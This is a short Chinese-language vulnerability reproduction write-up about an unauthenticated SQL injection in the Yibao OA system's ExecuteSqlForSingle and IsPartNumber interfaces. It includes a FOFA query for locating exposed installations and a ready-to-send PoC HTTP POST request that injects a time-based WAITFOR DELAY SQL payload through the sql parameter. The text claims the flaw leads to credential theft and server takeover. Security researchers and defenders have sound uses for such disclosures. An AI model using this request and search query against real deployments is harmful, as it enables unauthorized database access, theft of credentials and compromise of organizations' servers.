易宝OA ExecuteSqlForSingle SQL注入漏洞复现

本文介绍: 易宝OA Ex e cut eSqlFo rSin gl e、IsPa rtNumber 接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限

0x01 产品 简介

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、流程管理、知识管理（档案和业务管理）、协同办公等多种功能。

0x02 漏洞 概述

易宝OA ExecuteSqlFo rSin gle、IsPa rtNum ber接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限

0x03 复现 环境

FOFA：product=”顶讯科技-易宝OA系统“

0x04 漏洞复现

PoC-1

POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

token=zxh&amp;sql=;WAITFOR DELAY '0:0:5'--&amp;strParameters